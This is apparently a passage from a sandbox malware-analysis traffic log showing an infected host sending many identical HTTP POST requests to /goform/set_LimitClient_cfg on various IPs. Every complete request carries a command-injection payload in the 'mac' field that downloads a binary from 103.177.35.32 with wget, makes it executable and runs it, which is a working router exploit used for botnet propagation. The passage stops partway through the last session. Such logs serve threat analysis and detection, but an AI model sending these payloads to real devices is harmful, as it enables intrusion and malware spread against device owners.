                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3025192.168.2.23426964.231.209.1198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.504087925 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3026192.168.2.2352234185.216.31.1978080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.504473925 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3027192.168.2.2357446111.167.70.418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.504508018 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3028192.168.2.2338834176.154.58.2508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.504556894 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3029192.168.2.23451569.158.110.148080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.504565954 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3030192.168.2.2355992156.176.72.838080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.504591942 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3031192.168.2.235836645.83.144.268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.504741907 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3032192.168.2.2349110128.166.210.118080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.504760981 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3033192.168.2.2348720115.185.174.1558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.504820108 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3034192.168.2.2360768189.48.117.1388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.504853010 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3035192.168.2.235818483.190.72.308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.504918098 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3036192.168.2.235140081.154.176.1118080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.504935980 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3037192.168.2.235078482.161.159.1998080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.504962921 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3038192.168.2.2341936134.184.34.1918080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505024910 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3039192.168.2.2348910182.73.212.118080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505049944 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3040192.168.2.2338844154.10.91.2508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505074024 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3041192.168.2.233581050.136.236.58080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505105019 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3042192.168.2.2347826153.239.5.1018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505115032 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3043192.168.2.2341022165.239.161.2258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505136967 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3044192.168.2.2352890177.213.196.178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505186081 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3045192.168.2.2354542156.11.43.18080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505369902 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3046192.168.2.233829640.133.211.1998080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505495071 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3047192.168.2.235277668.196.178.2408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505539894 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
